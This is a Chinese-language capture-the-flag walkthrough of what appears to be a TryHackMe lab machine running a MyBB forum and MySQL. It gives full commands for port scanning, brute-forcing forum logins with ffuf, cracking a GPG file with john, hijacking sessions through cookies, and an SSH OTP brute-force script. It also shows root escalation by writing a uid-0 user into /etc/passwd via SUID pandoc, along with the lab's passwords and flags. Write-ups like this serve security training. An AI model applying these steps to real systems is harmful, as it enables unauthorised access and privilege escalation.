端口扫描

sudo nmap --min-rate 10000 -p- 10.10.33.27
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-05 12:01 CST
Warning: 10.10.33.27 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.33.27 (10.10.33.27)
Host is up (0.30s latency).
Not shown: 56561 closed tcp ports (reset), 8971 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql

Nmap done: 1 IP address (1 host up) scanned in 51.43 seconds
sudo nmap -sT -sV -sC -O -p22,80,3306 10.10.33.27
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-05 12:12 CST
Nmap scan report for 10.10.33.27 (10.10.33.27)
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2c:54:c1:d0:05:91:e1:c0:98:e1:41:f2:b3:21:d9:6b (RSA)
| 256 1e:ba:57:5f:29:8c:e4:7a:b4:e5:ac:ed:65:5d:8e:32 (ECDSA)
|_ 256 7b:55:2f:23:68:08:1a:eb:90:72:43:66:e1:44:a1:9d (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Linux-Bay
3306/tcp open mysql MySQL 5.5.5-10.1.47-MariaDB-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.47-MariaDB-0ubuntu0.18.04.1
| Thread ID: 109
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, LongColumnFlag, Speaks41ProtocolOld, SupportsTransactions, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, FoundRows, Speaks41ProtocolNew, InteractiveClient, IgnoreSigpipes, ConnectWithDatabase, ODBCClient, LongPassword, SupportsCompression, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: ov#Et<j"f]!*L#ifEfQD
|_ Auth Plugin Name: mysql_native_password
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.07 seconds
sudo nmap --script=vuln -p22,80,3306 10.10.33.27    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-05 12:14 CST
Nmap scan report for 10.10.33.27 (10.10.33.27)
Host is up (0.27s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 10
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /admin/: Possible admin folder
| /admin/index.php: Possible admin folder
| /archive/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /inc/: Potentially interesting folder
| /install/: Potentially interesting folder
|_ /uploads/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.33.27
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.33.27:80/misc.php?action=help
| Form id:
| Form action: misc.php
|
| Path: http://10.10.33.27:80/search.php
| Form id: author
| Form action: search.php
|
| Path: http://10.10.33.27:80/member.php?action=register
| Form id:
|_ Form action: member.php
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 79.49 seconds

发现mysql是对外开放的,但是我们没有什么凭据用于登录

Web

先后台扫下目录

根目录是一个类似官网界面?

/admin目录是一个登陆界面,而且用的是MyBB这套内容管理系统,想试着找一下版本,但是失败了。好多界面都没有什么用。看下房间的提示,让我们跟着white rabbit

在memberlist.php界面有用户界面,里面有个用户的头像是白兔子,但是有些东西我们好像看不了,注册个用户

界面加载得实在是慢(恼,换THM的kali了。

可以看这个用户所提交的posts,发现一个提交BUG的页面,/bugbountyHQ目录,但应该只是前端禁用,直接开F12把disable相关的都删了。

随便乱输入然后submit,之后自动来到reportPanel.php页面(也就是第一问的答案),发现了好多用户提交的BUG。房间提示是21年发表的漏洞

Edwards用户说存在弱密码,可以爆破。把这些弱密码都保存下来成字典

然后再收集所有用户名作为字典,不会爬虫(悲,于是只收集了第一面的用户名,但是管理员用户都在里面了

ffuf -u 'http://m4r.thm/member.php' -X POST -H 'Cookie: mybb[lastvisit]=1696564797; mybb[lastactive]=1696563039; _ga=GA1.2.435070034.1696562881; _gid=GA1.2.1358160263.1696562881; _gat_gtag_UA_120533740_1=1; sid=5606896caf58a6b1d2bda584b0c4ef35' -H 'Content-Type:application/x-www-form-urlencoded' -d 'username=USER&password=PASS&remember=yes&submit=Login&action=do_login&url=&my_post_key=7e560303dab8335ca5efb2ef969bc444' -w ./user.txt:USER -w ./pass.txt:PASS -fs 10289

要添加cookie才能正常跑好像,所以用了ffuf

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 43ms]

* USER: SnakeSolid
* PASS: linux123

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 42ms]
* PASS: secret
* USER: Tonynull

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 37ms]
* USER: BrucePrince
* PASS: secret

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 42ms]
* USER: Linda_Kale
* PASS: windowsxp

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 41ms]
* PASS: starwars
* USER: jscale

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 42ms]
* USER: bubbaBIGFOOT
* PASS: qwerty123

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 41ms]
* USER: PalacerKing
* PASS: qwerty

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 48ms]
* USER: ArnoldBagger
* PASS: Luisfactor05

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 2814ms]

* USER: SarahHunt
* PASS: Password123

得到了挺多的凭据,其中,ArnoldBagger和PalacerKing是管理员,登录ArnoldBagger试试

在左边的senditem里面发现了发给Sosaxvector用户的右键,有一个/devBuilds目录里面有一些插件和一个加密文件,根据房间的提示,我们应该是没有走错方向

在V2插件发现了一行关键信息

$sql_p = file_get_contents(‘inc/tools/manage/SQL/p.txt’); //read SQL password from p.txt

Mysql

也就是说p.txt.gpg这个加密文件里的是MySQL密码

在之前的reportPanel.php的源码里面发现了提示(说实话这里感觉脑洞有点大)

Keymaker message:
1 16 5 18 13 21 20 1 20 9 15 14 15 6 15 14 12 25 20 8 5 5 14 7 12 9 19 8 12 5 20 20 5 18 19 23 9 12 12 15 16 5 14 20 8 5 12 15 3 11 19 1 4 4 18 5 19 19: /0100101101100101011110010110110101100001011010110110010101110010

直接上cyberchef

1 16 5 18 13 21 20 1 20 9 15 14 15 6 15 14 12 25 20 8 5 5 14 7 12 9 19 8 12 5 20 20 5 18 19 23 9 12 12 15 16 5 14 20 8 5 12 15 3 11 19 1 4 4 18 5 19 19

apermutationofonlytheenglishletterswillopenthelocksaddress

/0100101101100101011110010110110101100001011010110110010101110010是一个目录。。。

有一串不明字符:诶比西迪伊吉艾杰开哦o屁西迪伊吉杰开哦艾杰开f哦屁q西屁西迪伊吉艾杰开哦x屁西迪伊吉艾杰开哦屁西迪伊吉艾杰开v哦屁西迪伊吉艾杰西迪伊g吉艾杰提维

根据上面提示说只有英文字母的排列组合才能解开密码

英文字母是:ofqxvg

用python进行排列组合

from itertools import permutations

# 给定的字母
letters = "ofqxvg"

# 生成所有排列组合
perms = permutations(letters)

# 打开文件并将排列组合写入文件
with open('password.txt', 'w') as file:
for perm in perms:
password = ''.join(perm)
file.write(password + '\n')

print("密码已经保存到password.txt文件中。")
/usr/sbin/gpg2john p.txt.gpg >hash

转换成hash

/usr/sbin/john --wordlist=password.txt hash

爆破得到密码:fvgoxq

gpg --decrypt p.txt.gpg

利用得到的密码解密,得到MySQL密码

myS3CR3TPa55 //SQL Password

根据插件提示,是使用用户”mod”来登录MySQL

mysql -h m4r.thm -umod -p
show databases;
use modManagerv2
select * from members;

找到了Ellie的login_key

G9KY2siJp9OOymdCiQclQn9UhxL6rSpoA3MXHCDgvHCcrCOOuT

Getshell

除此之外还有版主BlackCat的KEY

JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB

F12改Cookie,UID+KEY,UID就是memberlist.php里面的顺序,blackcat为7

刷新后变成blackcat

在USERCP中的ManagerAttachment中能看到有关加密算法的doc,SSH-TOTP

from datetime import datetime, timedelta
from hashlib import sha256
import random
from paramiko import SSHClient, AutoAddPolicy, AuthenticationException, ssh_exception
import os
import ntplib

class TimeSimulatorClient:
def __init__(self, sharedSecret1, sharedSecret2, sharedSecret3, targetIPAdress):
self.sharedSecret1 = sharedSecret1
self.sharedSecret2 = sharedSecret2
self.sharedSecret3 = sharedSecret3
self.targetIPAdress = targetIPAdress
self.listSecret = [sharedSecret1, sharedSecret2, sharedSecret3]

def setTimeZone(self):
try:
print('[*] Setting timezone to UTC')
print('[*] Before:')
os.system('sudo timedatectl --value')
os.system('sudo timedatectl set-timezone UTC')
print('[+] Timezone has been changed to UTC')
except:
print('[-] Couldn\'t set the timezone to UTC')

def syncTime(self):
try:
client = ntplib.NTPClient()
client.request(self.targetIPAdress) #IP of linux-bay server
print('[+] Synced to the time server')
except:
print('[-] Could not sync with time server')

def TimeSet(self, country, hours, mins, seconds):
now = datetime.now() + timedelta(hours=hours, minutes=mins)
#time units: day, hour, minutes
CurrentTime = int(now.strftime("%d%H%M"))

return CurrentTime

def getOTP(self):
CA = self.TimeSet('Ukraine', 4, 43, 0)
CB = self.TimeSet('Germany', 13, 55, 0)
CC = self.TimeSet('England', 9, 19, 0)
CD = self.TimeSet('Nigeria', 1, 6, 0)
CE = self.TimeSet('Denmark', -5, 18, 0)

listTimeSet = [CA, CB, CC, CD, CE]
randomTimeSet = random.sample(listTimeSet, 3)

# CTT = CA * CB * CC
CTT = randomTimeSet[0] * randomTimeSet[1] * randomTimeSet[2]

# UC = CTT XOR SST
UC = CTT ^ random.choice(self.listSecret)

# hash OTP
HC = (sha256(repr(UC).encode('utf-8')).hexdigest())

# HC Truncate
T = HC[22:44]

SSHOTP = T
return SSHOTP

def bruteForceSSH(self, SSHUsername, OTP):
print(f'[*] Trying SSH OTP: {OTP}', end='\r')

sshClient = SSHClient()
sshClient.set_missing_host_key_policy(AutoAddPolicy())
try:
sshClient.connect(self.targetIPAdress, username=SSHUsername, password=OTP, banner_timeout=300)
return True
except AuthenticationException:
# print(f'[-] Wrong OTP: {OTP}')
pass
except ssh_exception.SSHException:
print('[*] Attempting to connect - Rate limiting on server')

def main():
#shared secret token for OTP calculation
sharedSecret1 = {Redacted_SST_1}
sharedSecret2 = {Redacted_SST_2}
sharedSecret3 = {Redacted_SST_3}
# Change to the machine's IP
targetIPAdress = '10.10.95.198'


timeSimulatorClient = TimeSimulatorClient(sharedSecret1, sharedSecret2, sharedSecret3, targetIPAdress)

# Change timezone & sync to the time server
timeSimulatorClient.setTimeZone()
timeSimulatorClient.syncTime()

# Brute forcing SSH with computed OTP
SSHUsername = 'architect'
while True:
OTP = timeSimulatorClient.getOTP()
bruteForceResult = timeSimulatorClient.bruteForceSSH(SSHUsername, OTP)

if bruteForceResult is True:
print(f'[+] Found the correct OTP! {SSHUsername}:{OTP}')
break

if __name__ == '__main__':
main()

用了WP中大佬的解密脚本,机器IP需要改成自己的,3个SecretToken在testing.zip中的PNG中可以找到,改上就可以运行爆破了

得到之后要尽快登录,60秒后密码会更改又要重新爆破了

flag

fL4g{Ia]/[bEGYngn1nGT0bel13v3}

提权

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

找一下SUID

有一个pandoc的可以二进制,可以用于任意写入数据,可以更改passwd来添加一个root用户(在$之前要转移符号,不然echo添加的时候会被转义??)

cp /etc/passwd /tmp/passwd

openssl passwd -1 -salt hacker pass123

echo 'hacker:\$1\$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash'>>/tmp/passwd

cat /tmp/passwd | pandoc -t plain -o "/etc/passwd"

su hacker

成功提权

发现一个/etc/– -root.py

python3 /etc/-- -root.py

运行完之后就得到了flag

Flag{R3ALw0r1D4507Ez09WExit}

除此之外还有一个bigpaul.txt

得到

bigpaul = ilovemywifeandgirlfriend022366
ACP Pin = 101754⊕123435+689511

Pin需要计算,前两个异或然后加后面那个,等于718008

找到Webflag

fL4g{|amFre3N0w}

碎碎念

很困难的靶机,真实渗透环境(论坛环境)和CTF因素相结合,说实话思路还是有点混乱的,如果房间没有提示难度还会翻好几倍。。。信息搜集很重要唉,每一步都挺困难的,然后组合起来就是一个困难难度靶机。